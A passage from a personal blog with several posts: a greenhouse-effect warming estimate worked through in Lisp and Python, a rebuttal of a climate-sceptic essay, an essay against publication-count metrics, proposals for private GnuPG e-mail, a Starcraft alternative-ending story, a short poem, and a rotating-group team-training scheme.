So let us go at this backwards: \citet{Hoepfner2012} showed the state for 2012, what do our calculations predict for 1950 when we reduce the absorption due to CO\(_2\) by the 1.2 W/m\(^2\) radiative forcing given in the IPCC?3

The outgoing emissions would then not be 242.7 W/m\(^2\) as calculated by \citet{Hoepfner2012}, but 243.9 W/m\(^2\).

;; equilibrium temperature (in Kelvin) for 1950: with 1.2 W/m^2 less CO2
;; forcing, the outgoing longwave radiation is 243.9 instead of 242.7 W/m^2
(let* ((albedo 0.3)
       (sol 1362)
       (emiss 0.95)
       (incoming-watt (* (- 1 albedo) (/ sol 4)))
       (c 3e8)
       (h 6.62607e-34)
       (k 1.38065e-23)
       (pi 3.14159))
  (expt 
   (/ (* (/ 365.7 (+ 242.7 1.2)) incoming-watt (/ 1 emiss) 15 c c (expt h 3))
      (* 2 (expt pi 5) (expt k 4)))
   0.25))
       ;; for the numerator
       ;; (* (/ 365.7 (+ 242.7 1.2)) incoming-watt (/ 1 emiss)))

285.3902331695058

We get 285.39 Kelvin for 1950, about 0.35°C less than for 2010.

This gives an estimate of a 0.35°C increase in temperature from 1950 to 2010 due to increased CO\(_2\) levels alone. If we also remove the added absorption from methane, N\(_{2}O\) and other greenhouse gases emitted by humans (additional forcing of 0.75 W/m\(^2\)), we get 285.17 Kelvin.
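As a quick cross-check of that value (a small Python sketch, not part of the original calculation; the differences in the last digits come from rounding the constants):

sigma = 5.67e-8                       # W m^-2 K^-4, Stefan-Boltzmann constant
albedo, emissivity = 0.3, 0.95
absorbed = (1 - albedo) * 1362.0 / 4  # absorbed solar flux per unit surface, W/m^2
olr_nogas, olr_2010 = 365.7, 242.7    # Hoepfner2012: OLR without gas / with greenhouse gases
olr_1950 = olr_2010 + 1.2 + 0.75      # remove the human-caused forcing since 1950
t_1950 = (olr_nogas / olr_1950 * absorbed / emissivity / sigma) ** 0.25
print(t_1950)                         # about 285.2 K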

So this calculation from basics yields an increase of the equilibrium temperature by 0.57 °C.

\begin{equation} T_{2010} - T_{1950} = 285.74 K - 285.17 K = 0.57 K \end{equation}

This is a bit lower than the increase of 0.65 K to 0.75 K seen in the global temperature records by the Berkeley Earth project,4 and close to the 0.6 to 0.8 K increase shown in the Global (NH+SH)/2 temperature given by HadCRUT4 from the Met Office Hadley Centre, the national meteorological service of the United Kingdom.5 But for a calculation from basic principles, that’s pretty good.

So we can conclude that actual measurements match this physical explanation of global warming due to the greenhouse effect — or more exactly: due to increased absorption of infrared radiation by greenhouse gases, with the biggest effect due to CO\(_2\).

The source of the climate-active human carbon emissions which influence the CO\(_2\) content of the atmosphere is mostly the burning of fossil fuel: carbon which is taken from the crust of the Earth and introduced into the carbon cycle. This is what changes the CO\(_2\) concentration.

And with this, we are done.

Please reduce your carbon emissions and become active to get politicians to action on a national and global scale. We’re cutting the branch we live on.

If you want more details, have a look at the IPCC reports. Best start with the executive summary and then go into the details you’re most interested in:

IPCC Climate Change 2013: The Physical Science Basis: https://www.ipcc.ch/report/ar5/wg1/

An explanation how humans increase the CO₂-concentration of the atmosphere is available in my presentation The carbon cycle: https://www.draketo.de/licht/physik/kohlenstoffkreislauf-carbon-cycle

And if you want my best estimate of our current situation, have a look at the article Two visions of our future: https://www.draketo.de/english/politics/roll-a-die

Footnotes:

1

You can check the albedo for several different spectral regions at http://www.globalbedo.org/

3

We’re only going to 1950 and not back to 1850, because the temperature data at 1850 would mix in the effect of the declining little ice age.

4

Berkeley Earth provides a reevaluation of all the surface measurements without complex models.

5

HadCRUT4 combines sea surface temperature data from the Hadley Centre of the UK Met Office and the land surface air temperature records compiled by the Climatic Research Unit (CRU) of the University of East Anglia.

Author: Arne Babenhauserheide

Attachment (size):
greenhouse-effect.org (20.95 KB)
greenhouse-effect-solar-radiation-earth-radiation.svg (14.6 KB)
greenhouse-effect-solar-radiation-earth-radiation.png (62.39 KB)
greenhouse-effect-thumbnail.png (12.76 KB)
greenhouse-effect.pdf (349.56 KB)

comment on scientific consensus: distorting a debate to hide the majority view

I just discussed with “sceptics” on twitter about climate change. There Ronan Connolly (@RonanConnolly) showed me his article which tries to give the impression that there is no scientific consensus about climate change being man-made. I spent some time answering that, and I want to share those answers here so they do not get lost in twittering.

This is how that started:

Ronan Connolly: @ArneBab @dhb7 @randal_olson Arne, have you read my "Is there a scientific consensus on global warming?" essay? — 8:14 PM - 27 Jun 2014

These are my answers, in the short format I used on twitter, just with the recipients taken out (because those are highly repetitive):

The structure and style of the article

your scale of 1 to 5 mixes up two completely separate issues: “Is it a crisis” and “is it man-made”

You later complain that people mix global warming and man-made, but that’s what you do in the article.

Your claim that modellers want to hide uncertainty is also wrong: They are up-front with uncertainties.

At this point I saw a reply from Ronan (I had missed about 5 others because I was busy actually reading the article and watching the videos linked in it):

Ronan Connolly: Did you read the Shackley et al., 1999 article I referenced as an example?

that article says that modellers don’t talk publicly about adjustments they themselves call fudge factors, which correct for things the models cannot yet represent correctly - and it links to a 15-year-old paper which scientists have since acted upon, replacing the adjustments with measures backed by solid theory. To give Ronan’s article credit: It does also link to a chapter in the IPCC report which states that those flux adjustments are no longer used.

If you wonder why some don’t talk openly, just read your own article. I already debunked lots of it. Will you include that?

Ronan Connolly: Which bits have you debunked?

The core of my criticism (1/2): you show man-made + crisis vs. natural + harmless — and then complain people mix that up.

core criticism (2/2): You show 5 equal positions, while even Singer says “most disagree with me” ⇒ Misrepresents statistics.

You show a linear range, but there is a distribution of scientific views - with the huge majority on the man-made side.

If you give as much space for a fringe position as for a majority position, you distort the actual distribution.

You list “examples”, but actually you picked a scale and then show 2-3 on each point on the scale. Try that with racism.

and the range you show isn’t actually one range, but two distributions. Man-made is almost a consensus. Catastrophic is not.

you complain about terminology (global warming vs. man-made g.w.) and then you use a scale which mixes both together.

The scientists arguing for natural causes

On Prof. John Christy: I saw some model-results this week. Models cannot yet predict regional changes.

(he claims that the regional distribution of temperature change disagrees with models, and uses that to argue that there is no global warming)

On Prof. Christy: Greenpeace showed that, when cutting all subsidies, wind is already cheaper than nuclear.

Ronan Connolly: 1) Can you give a reference? […]

Reference to greenpeace showing that wind and water are cheaper than coal and nuclear: greenpeace-energy.de/presse/artikel/article/wind-und-wasser-schon-heute-billiger-als-kohle-und-atom.html

Debunking Prof. Carter: “half the scientists think the warming natural” ← None from the ones I know personally.

Debunking Singer: The oceans in the last 15 years show the warming. Same for satellites: http://www.skepticalscience.com/satellite-measurements-warming-troposphere.htm …

But to give Singer credit: He correctly assessed that most climate scientists disagree with him.

Also you cite Prof. Svensmark and then say the equivalent of “the base of their theory has been disproven”.

Ronan Connolly: 1) I said Svensmarck's work is hotly debated, not "disproven". 2) Do you agree that there's wide range of views on global warming?

On Svensmark: I said “it’s the equivalent of disproven”, because including new data destroys the correlation it’s based on.

(the second part was already disproven earlier in this article: Not one range, two distributions with a very clear consensus-peak at man-made)

Doing it right

To make the article halfway accurate in reflecting the scientific view, the two most important points to change are:

Done right (1/2): 2 scales: man-made vs. natural and crisis vs. harmless. ⇒ consistent with complaint that people mix these.

Done right (2/2): Ask scientists instead of using media interviews (distorted due to the fair-and-balanced doctrine).

(note that the fair-and-balanced doctrine is special to climate science: On Russia they never require fair-and-balanced)

(naturally the scientists have to be picked at random, so the distribution of views is sampled correctly).

counting scientific publications as metric for scientific quality is dumb

Scientific institutions1 currently base a large part of their internal evaluation, their comparison to others, and their hiring decisions on counting publications (with a number of different scorings).

And this is dumb.

On the surface this causes pressure to publish as many papers as possible2 which drives down quality of publications to the lowest standard reviewers accept.3 And it strengthens a hierarchy of publishers, where some publications are worth more than others based on the name of the journal. That simplifies funding decisions. But makes them worse. And it creates an incentive to get a maximum of prestige with a minimum of substance.4

But publications are how scientists communicate. Adding another purpose to them reduces their value for communication — and as such harms the scientific process. Add to this that the number of scientists is rising and that scientific communication is already facing a scalability crisis, and it’s clear that counting publications as a metric of value is dumb. That’s clear to every scientist I ever talked to in person (there are people in online-discussions who disagree).

That it is still done shows that this pressure to publish is a symptom of an underlying problem.

This deeper problem is that there is no possible way to judge scientific quality independently. But universities and funders want competition (by ideology). Therefore they crave metrics. But »When a measure becomes a target, it ceases to be a good measure.«

Science is a field where typically only up to 100 people can judge the actual quality of your work, and most of these 100 people know each other. Competition does not work as quality control in such a setting; instead, competition creates incentives for corruption and group-thinking. Therefore the only real defense against corruption are the idealism of scientific integrity (“we’re furthering human knowledge”) and harsh penalties when you get caught (you can never work as scientist again).

But if you have to corrupt your communication to be able to work in the first place, this creates perverse incentives for scientists5 and might in the long run destroy the reliability of science.

Therefore counting publications has to stop.

Science is a field where constant competition undermines the core features society requires to derive value from it. Post-doc scientists proved over more than a decade that they want to do good work. Their personal integrity is what keeps science honest. Scientific integrity is still prevailing in most fields against the corrupting incentives from constant forced competition, but it won’t last forever.

If we as society want scientists we can trust, if we want scientific integrity, we have to move away from competition and towards giving more people permanent positions in public institutions; especially for science staff, the people who do the concrete work; the people who conduct experiments, search for mathematical proofs, and model theories.

Scientific integrity, personal motivation to do good work for the scientific sub-community (of around 100 people), and idealism (which can mean to contradict the community), along with the threat of being permanently expelled for fraud, are the drivers which produce good, reliable scientific results.

To get good, reliable results in science, the most important task is therefore to ensure that scientists do not have to worry too much about other things than their scientific integrity, their scientific community, and their idealism. Because it is only the intrinsic motivation of scientists which can ensure the quality of their work.


  1. For this article scientific institutions mainly means those state-actors who finance scientists and those private actors who employ scientists and compete for state funding. 

  2. The problem here is pressure to inflate the impact metrics of publications. Publishing should be about communicating research, not about boosting one’s job opportunities. 

  3. This argument is based on discussions I had with many other scientists over the years, along with experiences like seeing that people split publications into several papers to increase the publication count, even though that does not improve the publication itself. It is also based on the realization that few scientists I met were still following all publications in their sub-field. For a longer reasoning see information challenges in scientific communication

  4. That said: While I did my PhD and postdoc in atmospheric physics (up until 2017), I worked with many scientists from several different countries, and every single one of them lived the idealism of scientific integrity and put it before the harmful incentives. So while some of the incentives over the past decades are a problem, they do not at present destroy the reliability of science in general. 

  5. The effect of these perverse incentives gets even worse due to the divide (keyword: dual labor market) between those in secure positions and young scientists, which forces almost everyone to survive the stage with perverse incentives before securing a stable position. This is so striking that from the outside it must look as if the current employment structure had been designed with the explicit intent to disrupt scientific integrity, though “grasping for straws when trying to do the impossible” (quantifying scientific quality) is likely a better explanation — which does not shed a good light on science administration and policy makers. 

Secure communication with GnuPG and E-Mail

How E-Mail with GnuPG could hide when you talk, where you talk from and what you talk about.

or in technical terms:

E-Mail with perfect forward security, hidden subject and masked date using GnuPG and better frontends.

Update 2018: Some of these ideas are becoming real and widespread now with pΞp (pretty-easy-privacy) and the autocrypt-standard.

If you regularly read my articles, you’ll know that I’m a proponent of connecting over Freenet to regain confidential and pseudonymous communication.

Here I want to show how it would be possible to use E-Mail with GnuPG to get close to the confidentiality of Freenet friend-to-friend communication, because we have the tech (among the most heavily scrutinized and well-tested technology we use today) and we have the infrastructure. All it requires are more intelligent E-Mail clients. Better UI which makes the right thing easy.

Why isn’t encrypted E-Mail confidential?

What is that wretched metadata?

Sending an encrypted E-Mail currently leaves all kinds of non-encrypted public traces while it travels over the servers:

  • When you wrote (date)
  • What you wrote about (subject)
  • Who you wrote to (sender + receiver)
  • Where you wrote from (via your IP)

Also there is no perfect forward security (PFS), so all your past E-Mail can be decrypted when someone one day manages to crack your key or the key of the person you talk to.

It might take a few weeks or months, but if at one point you become important, people in power will crack your key – maybe by simply hacking (or confiscating) your laptop.

And then they can read all E-Mails you received with it. Even if you deleted them, because they likely still have a copy.

Crack once, read everything

And finally, almost no one uses GnuPG, because (for one thing) key verification is cumbersome and E-Mail clients make it hard to use. But on the upside, all these issues can be solved without touching a line of GnuPG code. All you need to fix are the clients.

Regaining confidential communication with E-Mail

To make E-Mail confidential with GnuPG, there are 5 challenges to overcome:

  • Make GnuPG effortless to use (no setup for the user!)
  • Ensure that most encrypted content stays encrypted after security breaches
  • Protect the subject line
  • Mask the date and time of communication
  • Mask the physical location

I’ll go through them all with short notes how they can be realized. None of these requires experimental concepts, since most of the ideas have been known for years. They just weren’t collected and implemented.

Effortless GnuPG

The first issue which hinders users from encrypting is that they need to exchange and verify keys before they can use GnuPG. The second issue is incompatibility between free E-Mail clients.

Eradicating the requirement to verify all keys

Verifying every key is a major hassle, and it is only required if we want to be completely safe against man-in-the-middle attacks (MitM). That level of protection is not required, though: If we want to secure E-Mail for most users, we only need to ensure that a MitM is detected either when it starts or when it ends. That makes it arbitrarily expensive to realize mass surveillance, because it means that every MitM attack has to be preserved indefinitely: If it stops, the surveillance target will become suspicious and invest the effort to do a real key verification.

Detect start and end of MitM

This is no new idea: All this was already described in the GnuPG subproject STEED (whitepaper as PDF).

The most important part is to follow SSL/TLS and SSH by realizing TOFU for E-Mail: Trust on first use.
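As a minimal sketch of what trust on first use means for a mail client, in Python (the names here are hypothetical, not an existing GnuPG or client API):

# Hypothetical sketch, not an existing API: remember the first key seen per
# address and complain loudly when a later mail uses a different key.
known_keys = {}   # address -> key fingerprint; a real client would persist this

def check_sender_key(address, fingerprint):
    if address not in known_keys:
        known_keys[address] = fingerprint        # trust on first use
        return "new contact, key stored"
    if known_keys[address] == fingerprint:
        return "known key, ok"
    # A changed key marks the start or end of a possible MitM attack:
    # now (and only now) ask the user to verify the key out of band.
    return "WARNING: key changed, verify with the sender before trusting it"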

Usable key verification

Resilient interaction between different free clients

E-Mail clients frequently fail to verify E-Mails from other clients. We cannot fix unfree clients like Outlook, but the free ones can be changed to try again if a given method fails: Do everything possible to get the message decrypted and the signature verified, even if that requires being more relaxed than specified by an RFC. Other programs won’t get fixed just because your program shows that they do it wrong. People will just stop using GnuPG.

A recent example of this problem (which bit me personally) is that Thunderbird with Enigmail 1.7.0 and 1.7.2 failed to verify mails from KMail, but it’s not the first time that there are problems between those two. Another is that Enigmail fails to verify a mail from Horde with a user signature, because a space in the signature isn’t encoded correctly. It’s all well and good to say that Horde gets this wrong, but failing the verification without a sensible error (which tells the user how to fix the issue) is the worst possible reaction. That’s as if a web browser simply failed whenever there’s a problem on a website: Users would just stop using that browser. For some reason developers think that not decrypting a GnuPG message even though there’s no security problem is somehow OK.

Making interaction between E-Mail clients resilient requires a shift in mentality: That it is the responsibility of every client author to not just send correct E-Mails but also to treat decoding received E-Mails from all existing (free) clients as crucial to their task: If this fails, then the program is broken (within reasonable limits: correctly receiving E-Mails must not become so hard that no one implements it).

Usable encrypted E-Mail

Ensure that most encrypted content stays encrypted after security breaches

To protect the content of mails against breaking the main GnuPG keys we can realize Perfect Forward security for E-Mail by attaching a session key (the public key of a new keypair, signed by the main key of the sender) when sending an E-Mail to a given E-Mail address for the first time. When an E-Mail client receives such a session key and the signature is valid and from the sender, it should use that key as encryption key in subsequent answers - and attach its own session key.

Once the original sender switched to the session key of the original receiver, the communication can no longer be decrypted using only the main key of sender or receiver. Sender and receiver can save stored mail in re-encrypted form (with their main key) and refresh the session keys after a given number of mails were exchanged or after a given time (i.e. 100 mails or a month, whichever is longer - always keep usability in mind!).

This means that mail which sender and receiver did not store will be safe from decryption even if the main key of sender or receiver is cracked at some point. Protecting E-Mails on the disks of the communication partners is outside the threat model here: If an E-Mail is sensitive, the communication partners can simply delete it to ensure that it is really gone once they delete the session keys.
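A rough sketch of this exchange in Python, with hypothetical helpers (generate_keypair, sign, verify, encrypt) standing in for the real GnuPG operations; this only illustrates the flow and is not working GnuPG code:

# Illustration only: generate_keypair, sign, verify and encrypt are
# hypothetical stand-ins for the real GnuPG operations.

def send_first_mail(own_main_key, body, their_main_key):
    """First mail: encrypt with the main key, but attach a signed session key."""
    session_secret, session_public = generate_keypair()
    signed_session_key = sign(session_public, key=own_main_key)
    mail = encrypt(body, to=their_main_key)
    return mail, signed_session_key, session_secret   # keep session_secret locally

def reply(own_main_key, body, their_session_key, their_main_key):
    """Reply encrypted to their session key and attach an own signed session key."""
    if not verify(their_session_key, signer=their_main_key):
        raise ValueError("session key is not signed by the sender's main key")
    session_secret, session_public = generate_keypair()
    mail = encrypt(body, to=their_session_key)         # forward security starts here
    return mail, sign(session_public, key=own_main_key), session_secret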

Resilient Encryption: Perfect Forward Security

Protect the subject line

The most sensitive information which encrypted E-Mail still spills is the subject line. It provides the topic of the E-Mail and is sadly needed nowadays to protect against Spammers without trusting centralized services which cannot work for encrypted E-Mail.

To protect the subject line, we can follow the old Cypherpunk remailer protocol (example): Have an empty subject line, but start the encrypted content of the E-Mail with a new header field:

##
Subject: THE REAL SUBJECT

content to show the user follows here

(the cypherpunk protocol uses :: and ## as identifiers, and I don’t know the exact semantic difference, so you might find that using :: to start the replacement headers is more appropriate.)
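A client could extract such replacement headers from the decrypted text with a few lines of code; a minimal sketch in Python (the function name is mine):

def split_embedded_headers(decrypted_text):
    """Return (headers, body); headers found after a leading ## line
    replace the corresponding outer mail headers, e.g. the subject."""
    headers = {}
    body = decrypted_text
    lines = decrypted_text.splitlines()
    if lines and lines[0].strip() == "##":
        i = 1
        while i < len(lines) and ":" in lines[i]:
            name, value = lines[i].split(":", 1)
            headers[name.strip()] = value.strip()
            i += 1
        body = "\n".join(lines[i:]).lstrip("\n")
    return headers, body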

Using an empty subject is already a widespread (bad) practice, so it should not make the encrypted messages more traceable than before.

If users use no subject, the E-Mail clients should display the first 80 characters of the decrypted message in place of a subject. Yes, this only shows subjects after decrypting – which is how it should be.

Use an empty subject and redefine it in the encrypted part

Mask the date and time of communication

To hide when a message is written, we can mask it under other traffic: using encrypted E-Mail for automated coordination of programs. We already send encrypted, signed E-Mails, and for each E-Mail address there is an accepted key. So we can now select trusted contacts whose messages our E-Mail program can interpret automatically, for example to set calendar entries or update the address book. We can implement social features like subscribing to status updates (as on twitter) or re-sharing articles over E-Mail, because signed and encrypted E-Mail provides a trusted channel without creating an opening for spammers and scammers: If there is one piece of software which has been battle-tested by all kinds of malicious people, then it’s GnuPG. Using E-Mail to convey information to be interpreted automatically is for example what Infocalypse uses to implement pull-requests over Freenet (E-Mail over Freenet provides additional protections compared to plain E-Mail – it hides metadata and content thanks to using Freenet as anonymous decentralized data storage and avoids spam via propagating trust and spam marking – so it can already implement this automated information channel without exposing its users to large scale exploits).

But while it would be wonderful to have fully automated social features over E-Mail, this is just a side product: The really important effect would be that there would be a constant flow of cover traffic which hides actual communication.

Mask “When”: Social features as cover traffic to mask date and time of real messages

Mask the physical location

The final piece to the metadata puzzle is the physical location from which we communicated. If people can see where we wrote from, we can never write from a smartphone without exposing more metadata than I dare to think about.

To hide our location, we need an anonymizing channel like hidden services on tor or i2p.

Mask “Where”: Connect to your E-Mail provider over hidden services

If you can get your friends to join, too, then E-Mail over Freenet would already provide this without making your E-Mail provider a target for anonymous cracking attacks.

Conclusion

We already have the basic technology for making E-Mail between trusted friends truly confidential again. We can hide

  • The content of the mail,
  • The topic by faking the subject,
  • The time when we talked by creating cover traffic and
  • Our physical location where we wrote from.

People can still find out who knows whom, but can no longer see when they talk, where they talk from or what they talk about.

„Seit ich meine E-Mails mit GnuPG verschlüssele, habe ich keine Ausschreibung mehr an eine US-Firma verloren.“ (accurate translation: "Since I started encrypting my e-mails with GnuPG, I have not lost a single call for tenders to a US company anymore.") – Paul Sibel to Anna Gram from his towel on 2015-05-25. (english version from Google translate, slightly wrong but fun: "Ever since I encrypt my emails with GnuPG, I lost no invitation to a US company.")

So I call upon all E-Mail client developers: Please implement these measures to allow users to talk confidentially again. You do not need additional support from GnuPG for that. It can all be done in the code you know best.

We cannot make E-Mail pseudonymous, but at least we can make it confidential.

PS: The technology for this is not in E-Mail clients yet, so if you want confidential communication now, your best bet is to connect over Freenet – which additionally gives you pseudonymous communication. Using Freenet you regain the full set of communication options you have in the physical world:

  • confidential discussion in private,
  • self-censored public speech and
  • free pseudonymous publishing.

Strong Kerrigan

New Link: draketo.de/kreatives/strong-kerrigan

When you win Starcraft 2 Heart of the Swarm in brutal difficulty without losing Kerrigan even once, you get an ending with a truly strong Kerrigan.234

Clearly you are my greatest failure. Now at long last, you will die.

Again Mengsk activates the Xel'Naga artifact. As the lightning from the artifact tears at her flesh and cracks every part of her body, Kerrigan rasps an answer:

You forged me, but I chose my own path.

Emperor Mengsk takes a gun while Kerrigan’s bone-wings flail through empty air. She whispers:

There’s something you don’t know.

Her talons touch the base of the Xel'Naga artifact. Crushed by limbs which tear through the armor of siege tanks, the base cracks, breaks through the ground and disappears, taking the artifact with it.

Instantly Mengsk fires his gun. The shot hits Kerrigan’s head and throws her backwards to the ground.

It was nice, Kerrigan. Every dominion needs an enemy. You helped me stabilize my rule. But I could not give you the time to recover.

Kerrigan’s limbs shiver, her mouth forms silent words:

I am the swarm.

Mengsk fires again and Kerrigan’s body goes limp. Then Mengsk takes a rag to clean his gun. As he puts it away, a scream from one of his surviving guards echoes through the cracked door to his room. Moments later two Zerglings throw themselves through the opening and at Mengsk. Two sure shots take them out.

Then a faint voice echoes in Mengsk’s mind:

As long as…

A Hydralisk appears in the door, its fangs wide open, a spine readying deep in its throat. Mengsk fires and his shots crush bones, but the spine stays poised. Alien eyes focus on Mengsk, and the voice in his thoughts is no longer quiet. It booms in his mind and in all those around him:

…the swarm lives,…

The voice cuts through the mind of every being on the planet. Children cry, old men stumble and even the strongest are shaken to their very bones, as they see the image of Mengsk through the eyes of the Hydralisk. A distorted image of their Emperor, shimmering in the throb of blood within his veins. They feel the sudden release of the tension in the sinews of the Hydralisk as it catapults the spine towards Mengsk. And a voice pierces their minds which they will never forget in their lifetime:

…so do I.

The spine cuts through Mengsk’s armor and crushes his chest. Bone fragments fly from the wall behind him and blood spills over his uniform. As the Emperor slumps down and more Zerglings fill the room to tear him apart, the voice continues:

I am the swarm.

Billions of terrans stand witness as Kerrigan breaks free from a Zerg egg. Watched by a thousand Zerg, her bone wings extend into every corner of the living chamber that gave birth to her new body and caress the walls which pulsate with the rhythm of an alien heart. Her voice imprints her words into the memory of every terran on Korhal:

I now see my true enemy. He awaits me in the void. Wielding powers I cannot imagine. I go to face him, having renounced everything. My humanity. My identity. The man I love. But I will not face this enemy alone.

The presence weakens. Then a vast darkness fills the minds of all terrans on the planet, while they realize that now, they are alone. Alone with memories they can never forget.

I am the swarm.


  1. The epub icon was created by the Oxygen Team (kde.org) and is licensed under the GNU LGPL

  2. This is what I’d have wished to see. But it is just a fantasy, not the actual ending. 

  3. All characters in this story belong to Blizzard. I also published this story in the Starcraft forums

  4. The one thing I resent about Kerrigan in Starcraft 2 is that they made her weak.

    In SC1 Kerrigan embraced and ruled the swarm. She started as a strong terran, never letting anyone talk down to her, never afraid to say what she wanted. Then she got infested, and she prevailed over the infestation, becoming the queen of blades, ruling the Zerg instead of being ruled by the Overmind.

    In the cutscenes of SC2 she’s a helpless wreck, ever reliant upon the help of others and exposed as a tool of the overmind to free the swarm from Amon.

    It feels as if someone wrote the story to deconstruct the legend of the queen of blades. The in-game story seems much better, though: it’s mainly the cinematic cutscenes that make her weak. Including the last one — and that last one is what I set out to fix in this text. 

Attachment  Size
strong-kerrigan.epub  6.76 KB
application-epub-zip-128x128-lgpl-by-the-oxygen-team.png  17.75 KB
2015-05-01-Fr-starcraft-2-alternative-ending-strong-kerrigan.org  4.52 KB

Style over Substance

Stories of Weaklings, who win every fight
against bigger foes with their voices’ might,

Stories of Anarchists, who do nothing more,
than talk and talk, and still win the war.

Stories of Mages, who mumble and roar,
for a fizzling spell, which still makes them sore.

Stories of Dreamers, who sing in the night,
and weave our future, shining so bright.

All this you can find here, come out of the dark,
set Style over Substance, for that is our mark.

(I actually usually do the opposite, but there is
something to stories of those who live on style)

Team Starter

Get a team of 8-12 people connected and up to speed in a week, 24 in two weeks, 30 in three weeks — while never having more than 7 people in any group. Build a healthy team of 100 people with just one hierarchy level within 6 weeks.

Note that only the 8-12 structure is built on experiments. The others are theoretical considerations which will need to be adapted to the challenges of large operations.

(1) Principles for healthy teams

  • Groups of more than 7 people are not efficient at structured communication, so individual groups should have at most 7 people.1
  • Every team member should have worked with every other person at least once.
  • Stable subgroups have a mentor-trainee structure: One more experienced person with up to two beginners.
  • For large teams: Start with a group of people who become mentors and trainers for the others.

(2) Up to 7 people (one session)

Small teams up to 7 people simply train together. They all know each other.

(3) 8-12 people (4 sessions)

In larger teams the communication overhead would grow too large when all members are working in one group. With 8-12 people the training is done in two steps. In the first step, 6 volunteers do one session together. These volunteers become mentors for the others. In the second step, the team is split into 4 subgroups with 2 to 3 people, each with at least one of the volunteers from the first step (in addition to 1-2 beginners).2

(3.1) First step: 6 volunteers (1 session)

As first step, call for 6 volunteers. They do one session together where they learn the basics of the task for which you are building the team, as well as how to do the training.

At least four of the six volunteers will become mentors in the next step.

If you have 10 or more people to train (including the volunteers), up to two people can decide to get working instantly instead of taking part in further training. For example they can prepare the infrastructure for the others.

(3.2) Second step: 4 subgroups (3 sessions)

In the second step, the team is split in four subgroups. In each of the next 3 sessions, the four groups are joined in different ways into two larger groups, ensuring that each group worked with each other group after 3 sessions.

Let’s call the groups A, B, C and D.

Now three sessions with separate subtopics are done by two groups, each formed from two subgroups:

  1. AB and CD
  2. AC and BD
  3. AD and BC

Each of the sessions for each group is organized by one of the mentors, with the overall trainer providing materials and support.

For example the two groups in session 1 could be organized by the mentor from subgroup A and by the mentor from subgroup C. For session 2 the mentor from A and the mentor from B could organize. And in session 3 organization could be done by the mentor from D and the mentor from C.


After these three sessions, every person worked with every other person at least once, and each of the four subgroups stayed together during all of the second step. And within each subgroup, there’s a mentor-trainee structure, since one person in each subgroup already got the training in the first step. The mentors solidify their knowledge in the sessions they run by teaching part of what they learned before.

If during your training non-mentors want to switch subgroups, just add them to the other group. Only exchange in both directions if one of the subgroups would have only one person left.

Best avoid showing people their group. Instead always assign by name to avoid fostering competition during the training.

(4) 12 to 18 people (6 sessions)

As with 8-12 people the training is run in two steps. In the first step, 7 volunteers do one session together. These volunteers become mentors for the others. In the second step, the team is split into 6 subgroups with 2 to 3 people, each with at least one of the volunteers from the first step (in addition to 1-2 beginners). One of the groups can work without mentor, because the groups will be combined.

(4.1) First step: 7 volunteers (1 session)

As first step, call for 7 volunteers. They do one session together where they learn the basics of the task for which you are building the team, as well as how to do the training.

At least 3 of the 7 volunteers must become mentors in the next step, ideally 6 should become trainers.

If you have 14 or more people to train (including the volunteers), up to two people can decide to get working instantly instead of taking part in further training. For example they can prepare the infrastructure for the others.

(4.2) Second step: 6 subgroups (5 sessions)

In the second step, the team is split in 6 subgroups. In each of the next 5 sessions, the 6 groups are joined in different ways into 3 larger groups, ensuring that each group worked with each other group after 5 sessions.

This step requires at least 3 mentors from the first step. It should have 6 mentors.

Let’s call them A, B, C, D, E and F. The mentors are assigned to the groups in the order A,C,E,B,D,F. If there are 4 or fewer mentors, one group in session 2 will be run by the trainer. If there are only 3 mentors, sessions 3 and 4 will each also have one group run by the trainer (marked in the list below).

This works just like the training for 8-12 people, but with the grouping shown below.

  1. AB, CD, EF
  2. AC, BE, DF (needs trainer with 4 mentors)
  3. AD, BF, CE (needs trainer with 3 mentors)
  4. AE, BD, CF (needs trainer with 3 mentors)
  5. AF, BC, DE

(5) 16 to 24 people (8 sessions)

This training works like the 12 to 18 people step, but if there are 6 or fewer mentors, some sessions will need the trainer to run one of the groups.

  • Step 1 will be the same as for 12 to 18 people, but with 7 volunteers.
  • Step 2 must get at least 4 mentors, it should get 7.

Assign the mentors in order A,C,E,G,B,D,F,H.

  1. AB, CD, EF, GH
  2. AC, BE, DG, FH (needs trainer with 6 mentors)
  3. AD, BF, CG, EH (needs trainer with 4 mentors)
  4. AE, BC, DH, FG (needs trainer with 5 mentors)
  5. AF, BD, CH, EG (needs trainer with 4 mentors)
  6. AG, BH, CF, DE (needs trainer with 4 mentors)
  7. AH, BG, CE, DF (needs trainer with 5 mentors)

(6) 20 to 30 people (15 sessions = 3 weeks)

Training up to 30 people so everyone worked with everyone else in the group takes three steps.

(6.1) Step 1: train 4 to 7 people (1 session)

See 2. At least 3 of these must become mentors for the next step. To avoid requiring trainer-run sessions, at least 5 of these should become mentors (up to 6).

(6.2) Step 2: train at least 12 people (5 sessions)

See 4. At least 8 of these must become mentors for the next step. To avoid requiring trainer-run sessions, at least 9 should become mentors (up to 10).

This step can be done with 8 to 12 people and only 3 sessions instead (see 3), but might then require making all participants mentors.

(6.3) Step 3: train 20 to 30 people (9 sessions)

This works like (5) but mentors are assigned to groups in the order A,C,E,G,I,B,D,F,H,J. It requires at least 7 mentors. The groupings are as follows:

  1. AB, CD, EF, GH, IJ
  2. AC, BE, DF, GI, HJ (needs trainer with 8 mentors)
  3. AD, BF, CE, GJ, HI
  4. AE, BG, CJ, DH, FI
  5. AF, BH, CI, DG, EJ
  6. AG, BI, CH, DE, FJ (needs trainer with 7 mentors)
  7. AH, BJ, CF, DI, EG
  8. AI, BC, DJ, EH, FG
  9. AJ, BD, CG, EI, FH (needs trainer with 7 mentors)
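If you prefer to generate such pairings instead of writing them by hand, the standard round-robin ("circle") method produces them for any even number of subgroups. A minimal sketch in Python; note that it yields a valid but different ordering than the lists above and does not handle the assignment of mentors to sessions:

def round_robin(groups):
    """Pair up an even number of groups so that over len(groups)-1 sessions
    every group meets every other group exactly once (circle method)."""
    groups = list(groups)
    fixed, rotating = groups[0], groups[1:]
    sessions = []
    for _ in range(len(groups) - 1):
        row = [fixed] + rotating
        half = len(row) // 2
        sessions.append([row[i] + row[-1 - i] for i in range(half)])
        rotating = rotating[-1:] + rotating[:-1]   # rotate all but the fixed group
    return sessions

for session in round_robin("ABCDEFGHIJ"):
    print(", ".join(session))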

(7) Start an organization of 77 to 135 people as connected group (23 sessions)

Putting all of these together, you can go one step further and start an organization which is as well-connected as possible with the least possible resources and time.

  1. Train 5 to 7 people. At least 4 of these become mentors for the next step. 1 to 3 people can start working right away and prepare the workplace for others. See 2 (1 session).
